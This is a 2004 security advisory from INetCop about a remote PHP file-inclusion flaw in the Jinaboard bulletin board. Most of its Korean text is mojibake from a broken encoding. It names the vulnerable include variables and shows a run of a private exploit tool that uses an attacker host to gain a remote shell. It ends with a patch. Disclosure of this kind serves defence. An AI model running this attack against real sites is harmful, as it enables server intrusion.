========================================
	INetCop Security Advisory #2004-0x82-023
	========================================


* Title: Jinaboard Remote PHP Injection exploit


0x01. Description


PHP ÇÁ·Î±×·¡¹Ö Áß ÁÖÀÇÇØ¾ß ÇÒ °ÍÀÌ ¹Ù·Î PHP Injection Ãë¾àÁ¡ÀÔ´Ï´Ù.
´ëÇѹα¹ÀÇ ¸¹Àº °Ô½ÃÆÇ ¹× À¥ ¼Ö·ç¼ÇµéÀÌ ¹Ù·Î ÀÌ Ãë¾àÁ¡¿¡ ¹«·ÂÈ­µË´Ï´Ù.
ÀúÈñ INetCop Security Team¿¡¼­´Â ´ÙÀ½°ú °°Àº jinaboard Ãë¾àÁ¡À» ¹ß°ßÇÏ¿´½À´Ï´Ù.

ÀÌÀü ¹öÀü: jina_footer.php, jina_header.php
...
[root@test jinaboard]# cat *.php |grep include |grep env | grep -v php
        include "$env[JINA_FOOT_FILE]";
        include "$env[JINA_HEAD_FILE]";
[root@test jinaboard]#
...

ÃֽŠ3.x ¹öÀü: include/jina_footer.php, include/jina_header.php
...
[root@test jinaboard_new]# cd include/
[root@test include]# cat *.php |grep include |grep env | grep -v php
if($env[JINA_FOOT_FILE]) { include $env[JINA_FOOT_FILE]; } else { echo $env[JINA_FOOT]; }
<? if($env[JINA_HEAD_FILE]) { include $env[JINA_HEAD_FILE]; } else { echo $env[JINA_HEAD]; } ?><?
[root@test include]#
...

$env[JINA_FOOT_FILE] º¯¼ö¿Í $env[JINA_HEAD_FILE] º¯¼ö´Â °ø°Ý targetÀÌ µÉ °ÍÀÔ´Ï´Ù.


0x02. Vulnerable Packages


Vendor site: http://www.jinaboard.com/

jinaboard 3.0 Beta2 ÀÌÇÏ (°ÅÀÇ ¸ðµç ¹öÀü)
-jinaboard_3.0_Beta2.tar.gz
+Unix
+Linux
+Other

jinaboard 2.1.1
-jinaboard2.1.1.tar.gz
jinaboard 2.1
-jinaboard2.1.tar.gz
jinaboard 2.0
-jinaboard_2.0.tar.gz


0x03. Exploit


¿ì¸®´Â PHP Injection exploit¿¡ ´ëÇÑ 0day exploitÀ» °¡Áö°í ÀÖ½À´Ï´Ù.
(http://project.underattack.co.kr/0x82030909/)

¹°·Ð, jinaboard °ø°Ý ¹öÀü¿ë Äڵ带 º¸À¯ÇÏ°í ÀÖ½À´Ï´Ù.

--
[root@test src]# ./0x82-mess_0day -t 8 -u http://host/~board/jinaboard -s attacker_host
Select target:
{8} : Jinaboard last: ex_url) http://testsub.org/jinaboard/
attack target URL: http://host/~board/jinaboard
attacker host: http://attacker_host:8080/

 Remote PHP Injection 0day exploit by Xpl017Elz.

 *********** PRIVATE *************
 ** DON'T DISTRIBUTE !!!        **
 ** USE IT AT YOUR OWN RISK !!! **
 *********************************

 [*] Target host: host
 [+] Attacker host: attacker_host
 [+] Attacker port: 8080
 [+] make webserver mode.
 [+] http://attacker_host:8080/
 [+] Checking, process core file.
 [*] Make attack code.
  +- Target PHP variable name: "env[JINA_FOOT_FILE]".
 [+] Execute, Command ...

Linux Intel-x86-platform 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
/home/board/public_html/jinaboard/include
uid=99(nobody) gid=99(nobody) groups=99(nobody)
bash$
--


0x04. Patch


¹®¹ýÀûÀ¸·Î ¸·À» ¼ö ÀÖ´Â ¹æ¹ýÀº ´ÙÀ½°ú °°½À´Ï´Ù. (¸ðµç ¹öÀü ÇØ´ç)

jina_footer.php:
...
// patch core
if(eregi(":\/\/",$env[JINA_FOOT_FILE]))
{
        printf("\$env[JINA_FOOT_FILE] error");
        exit;
}
...

jina_header.php:
// patch core
if(eregi(":\/\/",$env[JINA_HEAD_FILE]))
{
        printf("\$env[JINA_HEAD_FILE] error");
        exit;
}
...

±× ¹Û¿¡ ¼­¹ö ¼³Á¤¿¡¼­ PHP Injetcion Ãë¾àÁ¡À» Â÷´ÜÇÒ ¼ö ÀÖ½À´Ï´Ù.
php.iniÀÇ ¼³Á¤ Áß, allow_url_fopen ¼³Á¤°ªÀ» 'On'¿¡¼­ 'Off'·Î ¼öÁ¤ÇØÁֹǷνá, ¿ø°Ý °ø°ÝÀÚÀÇ
ħÀÔÀ» ¸·À» ¼ö ÀÖ½À´Ï´Ù.

--
°¨»çÇÕ´Ï´Ù.


--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game)
             My World: http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--